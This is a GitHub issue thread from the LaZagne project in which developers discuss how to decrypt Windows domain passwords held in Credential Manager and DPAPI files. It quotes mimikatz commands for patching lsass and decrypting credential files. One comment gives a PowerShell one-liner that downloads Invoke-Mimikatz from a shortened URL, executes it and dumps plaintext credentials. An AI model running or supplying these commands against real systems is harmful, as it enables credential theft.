### ISSUE TITLE
Decrypting Domain Passwords 

### ISSUE THREAD

**Issue by AlessandroZ** [AlessandroZ/LaZagne#117]
Domain Passwords cannot be retrieved using [CredEnumerate](https://github.com/AlessandroZ/LaZagne/blob/master/Windows/lazagne/softwares/windows/credman.py#L18) function. These passwords belong to another category ([CRED_TYPE_DOMAIN_PASSWORD](https://msdn.microsoft.com/en-us/library/windows/desktop/aa374788(v=vs.85).aspx)). 

I spent a lot of time trying to retrieve these passwords in cleartext without success. I will try more when I will have some time, but if someone knows better than me how it works, please let me know. 

I don't want to use process injection into lsass.exe (in order to use LsaICryptUnprotectData), which could crash the process (and the computer). 

So I have seen very interesting ideas: 

- Patching the lsass.exe memory process which looks more stable than a dll injection as mimikatz does [here](https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_vault.c#L438): `mimikatz # vault::cred /patch`

- Domain passwords can be found in Windows Credentials files: 
```
C:\users\%username%\AppData\Roaming\Microsoft\Credentials\xxxx 
C:\users\%username%\AppData\Local\Microsoft\Credentials\xxx
 ```
However, I don't manage to decrypt it. Mimikatz does it very well (the master key should be retrieved before listing all masterkeys: `sekurlsa::dpapi`): 
 ```
mimikatz # dpapi::cred /in:C:\users\%username%\AppData\Roaming\Microsoft\Credentials\xxxx /masterkey:xxxxxxxx
 ```
Mimikatz needs admin right to retrieve the masterkey whereas other tools could to it without high privileges needed. 
Nirsoft [CredentialsFileView](www.nirsoft.net/utils/credentials_file_view.html) and [DataProtectionDecryptor](www.nirsoft.net/utils/dpapi_data_decryptor.html) can do it using current privilege privilege which means that a current user could decrypt it in his user context (perhaps using CryptUnprotectData ?)

I have tried to better understand DPAPI seeing the code of [mimikatz](https://github.com/gentilkiwi/mimikatz) and [DPAPICK](https://github.com/jordanbtucker/dpapick). But, I didn't manage to use the [crestore](https://github.com/jordanbtucker/dpapick/blob/a6693f5bef22e3ab963b2ba0b38596c3a1744e5b/DPAPI/Probes/credstore.py) file from DPAPICK without errors.  

Any interesting help will be grateful. Thanks a lot.

**Comment by Meatballs1** [comment]
Explanation: http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-credman 

I dont think the user can decrypt them? I would double check that assumptions about Nirsoft tools are correct.

**Comment by AlessandroZ** [comment]
I don't know if this post is up to date, because for me, mimikatz didn't inject any dll anymore, and "sekurlsa.dll" is not needed on new versions. For me, it analyses the lsass memory without injection needed (maybe I wrong). 

The post is from 2013 and the inject module does not exist on newer version : 
`mimikatz # inject::service samss sekurlsa.dll`

Thanks again, I will take a look to confirm what I said.

**Comment by jduncan8142** [comment]
This is from:
http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html
From comments though:
I've done this and it works well but does require admin. Maybe this helps not sure but think you for all your work on this great project. 
------------------
Just type this into PowerShell as an administrator: 
powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
This will give you the user password in plaintext in one command. Also, add this onto the end of the powershell script above:
>> C:\Output.txt

Expanded link:
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

**Comment by AlessandroZ** [comment]
The version 2.3.3 retrieved domain passwords. The Windows user password has to be found, otherwise creds files could not be decrypted.
